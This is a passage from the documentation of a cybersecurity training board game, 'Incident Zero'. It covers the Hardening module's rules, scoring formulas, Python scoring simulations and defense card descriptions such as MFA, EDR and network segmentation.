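        match = next((v for v in tactic.vectors if v in self.playbooks), None)
        if match is not None:
            total += 3
            self.playbooks.discard(match)  # one-time use
        self.tactics_faced += 1
        defended = total >= tactic.dc
        self.tactics_defended += int(defended)
        return defended

    def security_score(self) -> int:
        # The single v2.2 formula; budget efficiency rounded to the nearest point.
        return (len(self.defenses) * 5 + sum(self.defenses.values()) * 2
                + self.playbooks_created * 10 + self.tactics_defended * 5
                + round(self.budget / self.starting_budget * 10))

    def outcome(self) -> str:
        # VICTORY / PARTIAL / DEFEAT per the v2.2 win and loss gates.
        score = self.security_score()
        held = self.tactics_defended * 2 > self.tactics_faced
        lost = (self.tactics_faced - self.tactics_defended) * 2 > self.tactics_faced
        if score < 45 or self.budget <= 0 or lost:
            return "DEFEAT"
        if score >= 60 and len(self.defenses) >= 4 and held:
            return "VICTORY"
        return "PARTIAL"

# DCs and vectors from the PT-01..PT-08 table; the +2 (D-02 vs PT-01) and +4 (D-11 vs
# PT-06) bonuses from the worked example. D-08's +3 vs PT-02 is an ASSUMED sample value.
PT01 = Tactic(12, ("SOCIAL_ENGINEERING", "CREDENTIAL_ABUSE"), {"D-02": 2})
PT02 = Tactic(13, ("MALWARE", "CREDENTIAL_ABUSE"), {"D-08": 3})
PT06 = Tactic(14, ("DATA_EXFIL", "NETWORK"), {"D-11": 4})

def worked_example() -> Game:
    """The 7-turn game from the scoring example; d20 results are constructed."""
    g = Game()
    g.deploy("BASIC", "D-01", "D-02")        # Turn 1: Email Auth + User Training (Quick-Win)
    g.deploy("BASIC", "D-04", "D-19")        # Turn 2: Firewall Rules + Backup & DR (Quick-Win)
    g.deploy("ADVANCED", "D-08")             # Turn 3: EDR
    g.resolve_tactic(PT02, "D-08", d20=12)   #   PT-02 strikes: 12 + 3 = 15 >= 13, defended
    g.deploy("ADVANCED", "D-09")             # Turn 4: Network Segmentation
    g.create_playbook("MALWARE")             # Turn 5
    g.resolve_tactic(PT01, "D-02", d20=10)   #   PT-01 strikes: 10 + 2 = 12 >= 12, defended
    g.harden("D-08")                         # Turn 6: EDR +2
    g.deploy("ADVANCED", "D-11")             # Turn 7: DLP
    g.resolve_tactic(PT06, "D-11", d20=10)   #   PT-06 strikes: 10 + 4 = 14 >= 14, defended
    return g

def playbook_spam() -> Game:
    """Designer-note check: two playbooks, no defenses, rolls at d20 + 0 (+3 once each)."""
    g = Game()
    for vector in ("SOCIAL_ENGINEERING", "MALWARE"):
        g.create_playbook(vector)
    g.resolve_tactic(PT01, None, d20=9)    # 9 + 3 (playbook) = 12 >= 12, defended
    g.resolve_tactic(PT02, None, d20=8)    # 8 + 3 (playbook) = 11 < 13, fails
    g.resolve_tactic(PT06, None, d20=10)   # 10 < 14, no playbook left, fails
    return g
```

`worked_example()` scores 65 with 50 Budget left (Victory); `playbook_spam()` scores 34 and fails both the score and the four-defense gate.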


Difficulty Levels

All difficulty levels run 7 turns (v2.2); difficulty scales via Pentester Tactic count.

Beginner Hardening

Intermediate Hardening

Advanced Hardening

Expert: Continuation from Incident Response (Loss)


Tips for Threat Orchestrators

Balancing Defense Deployment

Too Easy:
- Teams deploy 8+ defenses with large budget remaining
- Almost all Pentester Tactics fail
- No meaningful decisions required
- Game feels trivial

Too Hard:
- Teams can only afford 3-4 defenses with budget exhausted
- Almost all Pentester Tactics succeed
- Team feels overwhelmed
- Frustration rather than learning

Just Right (within 7 actions and 150 Budget):
- Teams deploy 5-7 defenses with some budget remaining (the Quick-Win rule for BASIC pairs makes this achievable)
- 50-70% of Pentester Tactics fail (defenses work)
- Teams debate priorities and trade-offs
- Players learn through strategic choices

Adjustments:
- Lower budget (100) for harder game
- Higher budget (200) for easier game
- Fewer/more Pentester Tactics
- Provide feedback: "Your defenses are working well" or "Your SIEM isn't catching these"

Using Pentester Tactics Effectively

Timing: Draw first tactic after turn 3-4 (let teams deploy initial defenses)

Narrative: Always frame tactics as specific scenarios:
- "Your red team just attempted a supply chain attack..."
- "An advanced attacker is using living-off-the-land techniques..."
- "A coordinated insider attack is beginning..."

Strategy: Escalate difficulty
- Turns 1-2: No tactics (deployment phase)
- Turn 3: First tactic (softer: PT-01, DC 12)
- Turn 4: Second tactic (medium: PT-02 to PT-04, DC 13)
- Turn 5+: Third/fourth tactics (harder: PT-05 to PT-08, DC 14-15)

Common Teaching Moments

- Defense-in-Depth: When a chosen defense earns only a +0/+1 printed bonus, discuss why layers matter
- Cost-Benefit: Teams overspend on Elite defenses; discuss Advanced alternatives
- Upgrades: Teams ignore upgrades; show how +2 bonuses compound
- Playbooks: Teams underestimate playbooks; demonstrate their power (+3 bonus) — and note the 2-per-game cap


Extensions & Variations

Extended Hardening (60 minutes)

Compliance-Enhanced Hardening

Competitive Hardening Tournament

Defense Architecture Detailed Play


Educational Objectives

| Learning Goal | How Module Teaches It |
|---|---|
| Defense-in-depth concept | Deploy multiple layers, see some fail while others succeed |
| Resource prioritization | Limited budget forces choices between defenses |
| Trade-offs in security | BASIC cheap but weak vs. ELITE expensive but strong |
| Proactive vs. reactive | Hardening teaches prevention vs. IR's response focus |
| Layering effectiveness | Pentester Tactics show how weak defenses alone fail |
| Incident playbooks | Playbook mechanic teaches the value of preparation |
| Security architecture | Thoughtful defense selection teaches how to think architecturally |
| Cost-benefit analysis | Every budget point spent has consequences |

Quick Reference: Actions & Costs

| Action | Cost | Roll | Effect | Score |
|---|---|---|---|---|
| Deploy Defense | 10/15/25 | None | Active immediately (up to 2 BASIC per action, v2.2) | +5 each |
| Harden Upgrade | 5 | None | +2 effectiveness | +2 |
| Create Playbook | 10 | None | One-time +3 bonus (max 2 per game, v2.2) | +10 |
| Test & Drill | 0 | 11+ | Validates defense | +0 |

Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC. Each tactic defended: +5 Score.


Continuing to Other Modules

After Winning Hardening:
- Continue to Incident Response (test your defenses)
- Continue to Audit & Compliance (verify your hardening)
- Play again with new threat vectors

After Losing Hardening:
- Replay with different strategy
- Try higher budget variation
- Study which Pentester Tactics caused most losses
- Plan for those tactics in next iteration


v2.2 Playtest Edition Changes

Changes for playtesters to validate, and why they were made:

  1. Pentester Tactics unified to the PT-01–PT-08 deck. The 8 tactics previously embedded in this document (Bypass Basic Defenses, Zero-Day, etc.) are replaced by the printed card deck in cards/hardening/core-deck/pentester-tactic-cards.md. This removes duplicate, conflicting tactic definitions (including a "Persistence Expert" tactic that referenced a nonexistent PERSISTENCE vector).
  2. One canonical resolution formula. Defense roll = d20 + printed defense bonus for ONE chosen defense (per the tactic card) + hardening upgrades on that defense (+2 each) + relevant playbook (+3), vs. the tactic's printed DC. The old "+2 to +4 by tier", "roll 11+/13+", and multi-defense "synergy stacking" texts are removed. Validate: do DCs 12-15 feel fair with the printed bonuses?
  3. Fixed turn count: 7 turns, one action per turn, plus the Quick-Win rule (deploy up to 2 BASIC defenses as one action). Validate: can teams realistically field 5-7 defenses in 7 actions?
  4. Single scoring formula (shared with the standalone guide) including Pentester results and budget efficiency; tiers rescaled (win at 60+). Reputation removed from Hardening scoring — failed tactics simply score 0 and trigger their printed consequence.
  5. Anti-playbook-spam: playbooks capped at 2 per game, and victory requires ≥4 deployed defenses.

Designer note — why playbook spam can't win (v2.2 math):
- Playbook-spam strategy: 2 playbooks (cap) = 20 pts; 0 defenses = 0 pts; with no deployed defenses every Pentester roll is d20 + 0 (+3 once per playbook) vs DC 12-15, so expect ~1 of 3 tactics defended = 5 pts; budget efficiency (130/150) × 10 ≈ 9 pts. Total ≈ 34 — below the 60 threshold, and it fails the ≥4-defenses gate regardless. Cannot win.
- Balanced layered strategy: 7 defenses (35) + 1 upgrade (2) + 1 playbook (10) + 3 of 3 tactics defended (15) + budget efficiency (50/150 × 10 ≈ 3) = 65 → Victory. See the worked example above.


Need Help?


Hardening Module - Complete Rules
Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/hardening.md

Hardening Module: Standalone Play Guide

Version: 2.2 - Playtest Edition
Duration: 30-45 minutes
Players: 1 Threat Orchestrator + 2-4 Blue Team members
Best For: Defense architecture training, security design, proactive hardening practice


Module Overview

The Hardening Module teaches players how to build defense-in-depth—layered security controls that work together to protect critical systems. Players deploy defenses strategically, harden existing controls, and defend against pentester challenges.

This module focuses on proactive security rather than reactive incident response.


Setup (5 minutes)

1. Choose Difficulty Level

All difficulty levels run 7 turns, one action per turn (v2.2). Difficulty scales via Pentester Tactic count.

| Difficulty | Budget | Turn Limit | Pentester Tactics | Best For |
|---|---|---|---|---|
| Beginner | 150 | 7 turns | 2 cards | First-time, teaching defense concepts |
| Intermediate | 150 | 7 turns | 3 cards | Standard play, balanced challenge |
| Advanced | 150 | 7 turns | 4 cards | Experienced players, comprehensive test |

2. Set Your Scenario Context

Option A: Hypothetical Threat (Solo)

Threat Orchestrator describes a realistic threat scenario:

"Imagine your team successfully detected an attack last month. The attacker started with a phishing email, moved laterally through the network via SMB, and escalated privileges using a kernel exploit. Now you have time to harden your defenses. Here's the threat profile you need to defend against..."

Option B: Follow from Incident Response Module

If continuing from Incident Response:
- Use the attack chain that was just played
- Players now design defenses against those specific threats
- Discovered vectors guide defense selection

Option C: Generate Threat Vectors Randomly (v2.2 — one standard procedure)

Roll 1d6 for each of the six threat vectors to determine which threats you must defend against (1-2 = no notable threat, 3-4 = intermediate threat, 5-6 = advanced threat):
- Roll 1d6 for SOCIAL ENGINEERING threats
- Roll 1d6 for WEB EXPLOIT threats
- Roll 1d6 for CREDENTIAL ABUSE threats
- Roll 1d6 for MALWARE threats
- Roll 1d6 for NETWORK threats
- Roll 1d6 for DATA EXFIL threats

3. Blue Team Setup

4. Prepare Pentester Tactic Cards


Gameplay Loop (25-35 minutes)

Round Structure

Each turn represents time allocated to hardening (15-30 minutes of planning work per turn).

TURN SEQUENCE:

1. START OF TURN
   - Read turn number aloud ("Hardening Turn 1...")
   - Remaining budget announced

2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Discuss which hardening action to take
   - Decide strategy (deploy new defense, upgrade existing, create playbook)

3. ACTION EXECUTION
   - Perform chosen action
   - No roll needed for deployment (see below for when rolls occur)
   - Update trackers

4. END OF TURN
   - Advance Turn Tracker by 1
   - Draw 1 new Defense Card
   - Check if mid-game Pentester Challenge should occur

Four Available Actions

Action 1: Deploy a New Defense 🛡️

Cost: 10/15/25 Budget (by tier)
Roll Required: None—automatic success

How it works:
  1. Choose a Defense Card from your hand
  2. Announce which Asset or threat vector it defends
  3. Explain strategy (optional but encouraged): "Why are we deploying this defense?"
  4. Card is placed on the table (face up)

Outcome:
  - Defense is immediately active
  - No roll needed
  - All deployed defenses contribute to final Security Score

Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each).

Note (v2.2): The core deck contains one copy of each defense (D-01 to D-24), so each defense can only be deployed once per game. If you want duplicate deployments (e.g., two MFA implementations on different systems), print a second copy of the deck and house-rule it.


Action 2: Harden an Existing Defense ⬆️

Cost: 5 Budget per upgrade
Roll Required: None

How it works:
  1. Choose a Defense Card already deployed (from this turn or previous)
  2. Pay 5 Budget
  3. Mark defense with +2 effectiveness bonus (track on paper next to the card)
  4. Optionally explain: "We're improving this defense by..."

Examples of hardening:
  - "Hardening our EDR deployment by tuning behavioral analytics and adding threat intel integration" → EDR now has +2 bonus
  - "Hardening our MFA implementation by enabling hardware token requirements" → MFA now has +2 bonus
  - "Hardening Network Segmentation by adding microsegmentation within critical zones" → Network Seg now has +2 bonus

Strategic Value:
  - Each upgrade adds +2 to the defense's effectiveness
  - Upgrades can stack (e.g., MFA with +2, +2, +2 = +6 total)
  - Upgraded defenses are more likely to survive Pentester Tactics


Action 3: Create an Incident Response Playbook 📋

Cost: 10 Budget per playbook
Roll Required: None
Limit (v2.2): Maximum 2 playbooks per game

How it works:
  1. Choose a specific threat vector you want to prepare for
  2. Write a 1-2 sentence playbook describing your response (e.g., "Ransomware Outbreak Response: Immediate backup isolation, network segmentation, and access revocation")
  3. Place playbook card on the table
  4. When a Pentester uses a matching vector later, you get +3 bonus to your defense roll

Example Playbooks:
  - "Credential Compromise Incident: Forced MFA re-authentication and access token revocation"
  - "Supply Chain Attack Detection: Monitor unusual DNS and C2 beaconing patterns"
  - "Insider Threat Response: Behavioral analytics review and privileged access audit"
  - "Ransomware Response: Immediate backup isolation and network segmentation"

Strategic Value:
  - Playbooks cost more (10 Budget) but provide a larger bonus (+3)
  - Limited use (one-time per playbook, then discarded after use; max 2 per game)
  - Forces teams to predict which threats are most dangerous
  - Playbooks alone cannot win: victory requires at least 4 deployed defenses (v2.2)


Action 4: Test & Drill Defenses 🎯

Cost: 0 Budget (represents time, not money)
Roll Required: 11+ on d20

How it works:
  1. Announce you're conducting a drill/test of deployed defenses
  2. Choose one or more deployed defenses to test
  3. Roll 1d20 for each defense
  4. Each defense with a roll of 11+ succeeds; 10 or less fails

Outcome:
  - Success: Defense works properly; mark it as "tested" (contributes extra points at end)
  - Failure: Defense has implementation issues; no penalty, but doesn't count toward testing bonus

Strategic Value:
  - Free way to validate defenses
  - Successful tests add confidence (and points) but don't guarantee success against real attacks
  - Encourages thinking about deployment validation (realistic practice)


Mid-Game: Pentester Challenge

After turn 3 or 4, the Threat Orchestrator draws a Pentester Tactic Card (PT-01 to PT-08, see cards/hardening/core-deck/pentester-tactic-cards.md) and launches a simulated attack.

Pentester Attack Resolution (v2.2 — one canonical formula)

1. TO Describes the Attack Scenario
   Example (PT-02): "Your red team delivered a payload that uses only built-in Windows tools — living-off-the-land. Can your defenses detect it?"

2. Blue Team Chooses ONE Deployed Defense to Resolve With
   Team selects one deployed defense to defend against this attack

3. Roll the Defense Roll

Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3, one-time, matching vector)

Success if the total ≥ the tactic card's printed DC (DC 12-15 for PT-01 to PT-08).

If the chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply). Multi-vector tactics: two separate rolls, one defense each.

4. Outcome
   - Success: Defense holds; count as a Pentester Tactic Defended (+5 Security Score)
   - Failure: Attack succeeds; apply the consequence printed on the tactic card; no score for this tactic

Optional: Play multiple pentester tactics (2-4 total) across turns 3-6.
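The resolution steps above, worked through as an added example (this is not code from the Incident Zero project): the d20 result, the printed bonus (+0 when the chosen defense is not on the tactic card's bonus list), +2 per hardening upgrade, and the one-time +3 from a matching playbook are added and compared against the card's DC. The PT-02 values (DC 13; D-06 +1, D-08 +3, D-13 +2, D-14 +2) are copied from the PT-02 card in this bundle; the class and function names are the example's own. For a multi-vector tactic, call `resolve_roll` once per roll with a different chosen defense each time.

```python
from dataclasses import dataclass
from typing import Dict, Tuple


@dataclass
class TacticCard:
    card_id: str
    vectors: Tuple[str, ...]   # Target Vectors printed on the card
    dc: int                    # printed defeat DC
    bonuses: Dict[str, int]    # printed bonus list: defense id -> bonus


@dataclass
class DeployedDefense:
    card_id: str
    upgrades: int = 0          # Harden actions applied to this card (+2 each)


@dataclass
class Playbook:
    vector: str                # threat vector the playbook was written for
    used: bool = False         # one-time use, then discarded


# Values copied from the PT-02 card in this bundle.
PT_02 = TacticCard("PT-02", ("MALWARE", "CREDENTIAL_ABUSE"), 13,
                   {"D-06": 1, "D-08": 3, "D-13": 2, "D-14": 2})


def resolve_roll(tactic, defense, playbooks, die):
    """Resolve one defense roll against one tactic.

    die is the d20 result (1-20). Returns (total, success, breakdown).
    A matching unused playbook is consumed whether or not the roll succeeds,
    mirroring the 'one-time, then discarded after use' rule.
    """
    if not 1 <= die <= 20:
        raise ValueError("d20 result must be between 1 and 20")
    printed = tactic.bonuses.get(defense.card_id, 0)   # +0 if not on the bonus list
    playbook_bonus = 0
    for pb in playbooks:
        if not pb.used and pb.vector in tactic.vectors:
            pb.used = True                             # spent, even on a failed roll
            playbook_bonus = 3
            break
    total = die + printed + 2 * defense.upgrades + playbook_bonus
    breakdown = {"die": die, "printed": printed,
                 "upgrades": 2 * defense.upgrades, "playbook": playbook_bonus}
    return total, total >= tactic.dc, breakdown


if __name__ == "__main__":
    edr = DeployedDefense("D-08", upgrades=1)
    books = [Playbook("MALWARE")]
    print(resolve_roll(PT_02, edr, books, 5))    # (13, True, {...}): exactly meets DC 13
    print(resolve_roll(PT_02, edr, books, 5))    # (10, False, {...}): playbook already spent
```

The breakdown dictionary is what the Threat Orchestrator would read aloud at the table, so disagreements about which bonus applied can be settled term by term.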


Scoring & Final Security Posture

Security Score Calculation (v2.2 — same formula as the module rules)

Defenses Deployed:          Count × 5 points
Hardening Upgrades:         Count × 2 points
Playbooks Created:          Count × 10 points   [max 2 playbooks per game]
Pentester Tactics Defended: Count × 5 points
Budget Efficiency:          (Remaining Budget / Starting Budget) × 10 points

EXAMPLE (150 starting budget, 7 turns):
- 7 defenses deployed (two turns used the 2-BASIC Quick-Win):  35 points
- 1 hardening upgrade:                                          2 points
- 1 playbook created:                                          10 points
- 3 of 3 pentester tactics defended:                           15 points
- 50 budget remaining (spent 100): (50/150) × 10 ≈              3 points
────────────────────────────
TOTAL SECURITY SCORE:                                          65 points → Strong (Victory)

Scoring Tiers (v2.2 — rescaled for the 7-action economy)

Score      Level         Interpretation
75+        Exceptional   Enterprise-grade security posture; sophisticated threat preparedness
60-74      Strong        Mid-market ready; layered, comprehensive defenses
45-59      Adequate      Startup-level protection; covers main attack vectors
30-44      Weak          Minimal protection; significant gaps remain
Below 30   Vulnerable    Inadequate defenses; likely to fail against sophisticated attacks

Winning & Losing

Victory Condition ✓ (v2.2)

Blue Team Wins Hardening if ALL of:
  - Final Security Score ≥ 60 (strong layered defenses)
  - AND at least 4 defenses deployed (playbooks and upgrades alone cannot win)
  - AND majority of Pentester Tactics were successfully defended against

Defeat Condition ✗

Blue Team Loses Hardening if:
  - Final Security Score < 45 (inadequate protection)
  - OR Budget exhausted before defenses were deployed
  - OR majority of Pentester Tactics succeeded despite defenses

Scores of 45-59 that meet the tactic/defense requirements count as a partial success.
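The scoring formula, tier table and win/loss conditions above, as an added example (not code from the Incident Zero project). It reproduces the worked example in the guide (7 defenses, 1 upgrade, 1 playbook, 3 of 3 tactics defended, 50 budget left → 65, Strong, Victory) and enforces the v2.2 limits (at most 2 playbooks, at least 4 defenses to win). The "budget exhausted before defenses were deployed" defeat condition depends on turn order, which end-of-game counts do not capture, so it is not modelled; outcomes the guide does not define (for example a 60+ score with fewer than 4 defenses) are returned as "unresolved" rather than guessed. Names are the example's own.

```python
from dataclasses import dataclass

STARTING_BUDGET = 150
MAX_PLAYBOOKS = 2

# Scoring tiers from the v2.2 table: (lower bound, label), highest first.
TIERS = [(75, "Exceptional"), (60, "Strong"), (45, "Adequate"),
         (30, "Weak"), (0, "Vulnerable")]


@dataclass
class HardeningResult:
    defenses: int          # Defense Cards deployed
    upgrades: int          # Harden actions taken
    playbooks: int         # playbooks created (max 2)
    tactics_played: int    # Pentester Tactics launched by the TO
    tactics_defended: int  # of those, how many the Blue Team defended
    remaining_budget: int
    starting_budget: int = STARTING_BUDGET


def security_score(r):
    """Security Score per the v2.2 formula; the efficiency term is rounded
    to a whole point, as in the guide's worked example ((50/150) x 10 ≈ 3)."""
    if r.playbooks > MAX_PLAYBOOKS:
        raise ValueError("v2.2 allows at most 2 playbooks per game")
    if r.tactics_defended > r.tactics_played:
        raise ValueError("cannot defend more tactics than were played")
    efficiency = round(r.remaining_budget / r.starting_budget * 10)
    return (r.defenses * 5 + r.upgrades * 2 + r.playbooks * 10
            + r.tactics_defended * 5 + efficiency)


def tier(score):
    for floor, label in TIERS:
        if score >= floor:
            return label
    return "Vulnerable"


def verdict(r):
    """Return (score, outcome) where outcome is victory / defeat /
    partial success / unresolved, following the Winning & Losing rules."""
    score = security_score(r)
    succeeded = r.tactics_played - r.tactics_defended
    majority_defended = r.tactics_defended * 2 > r.tactics_played
    majority_succeeded = succeeded * 2 > r.tactics_played
    if score < 45 or majority_succeeded:
        return score, "defeat"
    requirements_met = r.defenses >= 4 and majority_defended
    if score >= 60 and requirements_met:
        return score, "victory"
    if 45 <= score < 60 and requirements_met:
        return score, "partial success"
    return score, "unresolved"   # not defined by the guide (e.g. 60+ with < 4 defenses)


if __name__ == "__main__":
    example = HardeningResult(7, 1, 1, 3, 3, 50)
    s, outcome = verdict(example)
    print(s, tier(s), outcome)   # 65 Strong victory
```

Running the module reproduces the guide's example; the tests exercise a sub-45 defeat, a game where two tactics split one each (no majority either way), and the playbook cap.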


Debrief & Reflection (5-10 minutes)

PART 1: DEFENSE STRATEGY (3 min)
  1. "How did you prioritize which defenses to deploy first?"
  2. "What layers of defense work best together?"
  3. "Did the Pentester Tactics reveal gaps? Which ones?"

PART 2: RESOURCE MANAGEMENT (2 min)
  1. "Did you run out of budget? Would more budget have helped?"
  2. "Which defenses provided the best value (cost vs. effectiveness)?"
  3. "Would you have allocated budget differently?"

PART 3: PENTESTER RESULTS (2-3 min)
  1. "Which Pentester Tactic was most surprising?"
  2. "Which defense was most valuable against attacks?"
  3. "How would you harden further given unlimited budget?"

PART 4: REAL-WORLD APPLICATION (2 min)
  1. "If you were hardening your actual organization, what would you deploy first?"
  2. "Why is defense-in-depth difficult in practice?"
  3. "What's the hardest part of maintaining layered security?"


Tips for Threat Orchestrators

Balancing Defense Deployment

Too Easy:
  - Teams deploy 8+ defenses with budget to spare
  - All Pentester Tactics fail
  - No difficult decisions required

Too Hard:
  - Teams can only afford 3-4 defenses
  - Most Pentester Tactics succeed
  - Team feels overwhelmed

Just Right:
  - Teams deploy 5-7 defenses with some budget left
  - 50-70% of Pentester Tactics fail
  - Teams debate defense priorities

Adjust by:
  - Starting budget (120, 150, or 180)
  - Number of Pentester Tactics (2, 3, or 4)
  - Defense card availability (more common defense draws)

Pentester Tactic Timing

Narrative framing: "Your red team has tested your defenses..."

Running as Competitive Tournament

If multiple teams are hardening simultaneously:
  - All teams get the same starting threat vectors
  - All teams draw from the same card deck (or equivalent decks)
  - Highest Security Score wins
  - Tiebreaker: Most Budget remaining


Sample Scenarios to Try

Scenario 1: "Post-Phishing Hardening" (Beginner)

Threat Vector: SOCIAL ENGINEERING
Budget: 150
Pentester Tactics: 2

Setup: "Your team detected a phishing attack. Now harden against social engineering threats."

Suggested defenses:
  - D-01: Email Authentication Setup (BASIC)
  - D-02: User Security Training (BASIC)
  - D-07: Multi-Factor Authentication (ADVANCED)
  - D-20: Zero Trust Access Control (ELITE)


Scenario 2: "Ransomware Preparedness" (Intermediate)

Threat Vectors: MALWARE, DATA EXFIL, NETWORK
Budget: 150
Pentester Tactics: 3

Setup: "A ransomware variant targeted your industry. Prepare your defenses."

Key defenses:
  - D-08: EDR (Endpoint Detection & Response)
  - D-11: Data Loss Prevention (DLP)
  - D-09: Network Segmentation
  - D-15: Deception Technology (Honeypots)
  - D-19: Backup & Disaster Recovery
  - D-23: IR Program & Runbooks


Scenario 3: "Enterprise Hardening" (Advanced)

Threat Vectors: All 6 (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, DATA EXFIL)
Budget: 150
Pentester Tactics: 4

Setup: "Your enterprise faces threats across all vectors. Build comprehensive defense-in-depth."

Challenge: Defend against all six vectors with limited budget


Extensions & Variations

Hardening Plus (Extended Play)

Duration: 45-60 minutes
  - Start with Budget: 200 (more resources)
  - Play 9 turns instead of 7 (more time)
  - 4-5 Pentester Tactics (more challenges)
  - Raise the playbook cap from 2 to 3

Defense-in-Depth Deep Dive

Focus on layering:
  - Each turn, discuss why defenses work together
  - Create explicit layer descriptions: "Layer 1 (Prevention), Layer 2 (Detection), Layer 3 (Response)"
  - Score based on how well defenses complement each other

Compliance Integration

Add a compliance requirement:
  - Teams must defend against threat vectors while meeting compliance requirements (PCI-DSS, GDPR, HIPAA)
  - Some defenses satisfy both security and compliance
  - Creates strategic depth


Next Steps After This Module

If you won:
  - Continue to Incident Response Module (as follow-up) → Test your defenses against attacks
  - Continue to Audit & Compliance Module → Validate your security posture

If you lost:
  - Replay with higher budget
  - Try a less complex scenario
  - Play Incident Response to understand what defenses are actually needed

Standalone: Play again with different threat vectors and Pentester Tactics


Quick Reference: Action Costs & Effects

Action            Cost       Effect                                                              Roll
Deploy Defense    10/15/25   Defense active immediately (up to 2 BASIC per action, v2.2)         None
Harden Upgrade    5          +2 effectiveness to defense                                         None
Create Playbook   10         +3 bonus when used once (max 2 per game, v2.2)                      None
Test & Drill      0          Validate defenses                                                   11+

Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC.

For the full list of v2.2 changes and the reasoning behind them, see the "v2.2 Playtest Edition Changes" section in Module: Hardening.


Need Help?


Hardening Module - Standalone Play Guide
Part of Incident Zero, a modular cybersecurity board game

cards/hardening/core-deck/defense-cards.md

Hardening Module: Defense Cards (Shared with Incident Response)

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Overview

These 24 Defense Cards are shared between the Incident Response and Hardening modules. In Hardening, teams deploy these same defenses to build defense-in-depth and test them against Pentester Tactics.


Defense Card Organization

Tier System

Note (v2.2): Tiers are grouped by section below. Card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous.

Countermeasure Vectors

Vectors: plural convention (v2.2): Most defenses list a single vector. A few list two (marked "Vectors:"). A dual-tagged defense counts as a vector match for either listed vector.


BASIC TIER DEFENSES (10 Budget Each)

D-01: Email Authentication Setup

Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING

Deploy SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication, Reporting & Conformance) to prevent email spoofing.

Effect: Blocks phishing emails claiming to be from your domain. Requires attackers to find alternative vectors.

Used Against: T-01 (Phishing Campaign)


D-02: User Security Training

Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING

Conduct phishing awareness training for all staff. Teach recognition of suspicious links, sender spoofing, urgency tactics, and credential harvesting attempts.

Effect: Reduces successful phishing rate by 70-80%. Users become your first line of defense.

Used Against: T-01, T-02 (Phishing, Watering Hole)


D-03: Windows Update Patching

Tier: BASIC (10 Budget) Vector: WEB_EXPLOIT

Deploy automated Windows Update management across all systems. Establish patch deployment timelines (critical = 48 hours, high = 2 weeks).

Effect: Closes browser and kernel vulnerabilities. Prevents watering hole and exploit kit attacks.

Used Against: T-02 (Watering Hole), T-05 (Privilege Escalation)


D-04: Network Firewall Rules

Tier: BASIC (10 Budget) Vector: NETWORK

Deploy perimeter firewall rules to block unauthorized outbound protocols. Default-deny for unusual ports and known malware C2 domains.

Effect: Prevents early-stage lateral movement and C2 beaconing. Slows attacker reconnaissance.

Used Against: T-04 (Lateral Movement), T-09 (C2 Beaconing)


D-05: Log Centralization

Tier: BASIC (10 Budget) Vector: MALWARE

Deploy centralized log aggregation (syslog, Splunk, ELK). Forward Windows Event Logs, firewall logs, DNS queries, and proxy logs to central SIEM.

Effect: Makes local log tampering difficult. Provides investigative visibility into attacker activities. Foundation for threat hunting.

Used Against: T-07, T-08 (Persistence attacks)


D-06: Basic Antivirus Deployment

Tier: BASIC (10 Budget) Vector: MALWARE

Deploy signature-based antivirus across all endpoints. Enable automatic definition updates (daily). Configure real-time file and email scanning.

Effect: Catches known malware variants. Does not detect zero-day or polymorphic malware. Useful as part of defense-in-depth.

Used Against: T-05, T-07, T-08 (Malware-based attacks)


D-19: Backup & Disaster Recovery

Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE; 3-2-1 backups are fundamental hygiene) Vector: MALWARE

Implement 3-2-1 backup strategy: 3 copies of data, 2 different storage types, 1 offsite copy. Test restore procedures quarterly.

Effect: Enables rapid recovery from ransomware. Ensures data availability even if primary systems are compromised. Critical for business continuity.

Used Against: T-07, T-08, T-10, T-11, T-12 (Persistence and exfil attacks)


D-23: IR Program & Runbooks

Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE and renamed from "Incident Response Playbooks" to avoid confusion with the Hardening "Create Playbook" action) Vector: NETWORK

Establish an incident response program with detailed runbooks for common scenarios: malware infection, data exfiltration, ransomware, insider threats, supply chain compromise. Include roles, responsibilities, communication plans.

Effect: Enables faster, more coordinated response when incidents occur. Reduces confusion during high-pressure situations. Improves incident containment and recovery time.

Used Against: T-09, T-10, T-11, T-12 (All C2 & Exfil attacks)


ADVANCED TIER DEFENSES (15 Budget Each)

D-07: Multi-Factor Authentication (MFA)

Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE

Deploy MFA for all remote access (VPN, RDP), email, and admin portals. Use authenticator apps or hardware tokens (not SMS).

Effect: Makes compromised credentials useless without the second factor. Blocks credential stuffing attacks.

Used Against: T-03 (Compromised Credentials), T-06 (Mimikatz)


D-08: EDR (Endpoint Detection & Response)

Tier: ADVANCED (15 Budget) Vector: MALWARE

Deploy EDR agent on all endpoints. Monitor process execution, file creation, registry modifications, and memory injection attempts. Enable behavioral analytics.

Effect: Detects living-off-the-land attacks (PowerShell, cmd, scheduled tasks). Provides deep visibility into attack progression.

Used Against: T-05 (Priv Esc), T-07, T-08 (Persistence)


D-09: Network Segmentation

Tier: ADVANCED (15 Budget) Vector: NETWORK

Implement VLANs and microsegmentation to separate user workstations from servers. Deploy firewall rules between segments. Implement zero-trust network access controls.

Effect: Prevents lateral movement via SMB and other internal protocols. Limits blast radius of compromise.

Used Against: T-04 (Lateral Movement), T-06 (Credential Dumping spread)


D-10: SIEM Correlation Rules

Tier: ADVANCED (15 Budget) Vector: NETWORK

Create SIEM rules to detect attack patterns: failed login spikes, privilege escalation attempts, unusual process creation, scheduled task creation, and data exfil indicators.

Effect: Correlates events across logs to detect multi-step attacks. Enables faster investigation and response.

